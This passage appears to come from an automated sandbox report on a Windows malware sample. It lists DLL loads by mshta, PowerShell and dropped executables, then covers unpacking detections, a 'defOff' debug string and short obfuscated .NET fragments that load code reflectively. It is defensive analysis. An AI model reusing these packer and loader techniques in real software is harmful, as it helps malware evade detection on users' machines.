Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: DhqvS8pXj8.exe

Static file information: File size 2142208 > 1048576

Source: DhqvS8pXj8.exe

Static PE information: Raw size of fsnlaalu is bigger than: 0x100000 < 0x19f200

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: k6Sly2p.exe, 00000007.00000002.2626991613.0000000004854000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2626991613.00000000047DB000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2833835678.0000000005750000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: k6Sly2p.exe, 00000007.00000002.2626991613.0000000004854000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2626991613.00000000047DB000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2833835678.0000000005750000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, 00000017.00000002.2447686748.0000000000692000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: protobuf-net.pdb source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Unpacked PE file: 0.2.DhqvS8pXj8.exe.2c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 1.2.skotes.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Unpacked PE file: 23.2.TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hrrnbomn:EW;cbgcjyrp:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Unpacked PE file: 46.2.483d2fa8a0d53818306efeb32d3.exe.510000.0.unpack :EW;.rsrc:W;.idata :W; :EW;epptfshe:EW;zgobaftm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;epptfshe:EW;zgobaftm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Unpacked PE file: 64.2.TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE.dc0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hrrnbomn:EW;cbgcjyrp:EW;.taggant:EW; vs :ER;.rsrc:W;

.NET source code contains method to dynamically call methods (often used by packers)

Source: random[2].exe.6.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: RQsQTTbUYeEtZ5KVMrb(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{RQsQTTbUYeEtZ5KVMrb(typeof(IntPtr).TypeHandle),RQsQTTbUYeEtZ5KVMrb(typeof(Type).TypeHandle)})
Source: 1e8dfbd5c2.exe.6.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: RQsQTTbUYeEtZ5KVMrb(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{RQsQTTbUYeEtZ5KVMrb(typeof(IntPtr).TypeHandle),RQsQTTbUYeEtZ5KVMrb(typeof(Type).TypeHandle)})
Source: random[1].exe.6.dr, PjMboxrZKVMRiayL4T.cs	.Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 5d2afc26b8.exe.6.dr, PjMboxrZKVMRiayL4T.cs	.Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})

.NET source code contains potential unpacker

Source: k6Sly2p.exe.6.dr, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: k6Sly2p.exe.6.dr, -.cs	.Net Code: _0001 System.AppDomain.Load(byte[])
Source: k6Sly2p[1].exe.6.dr, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: k6Sly2p[1].exe.6.dr, -.cs	.Net Code: _0001 System.AppDomain.Load(byte[])
Source: k6Sly2p.exe0.6.dr, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: k6Sly2p.exe0.6.dr, -.cs	.Net Code: _0001 System.AppDomain.Load(byte[])

Suspicious powershell command line found

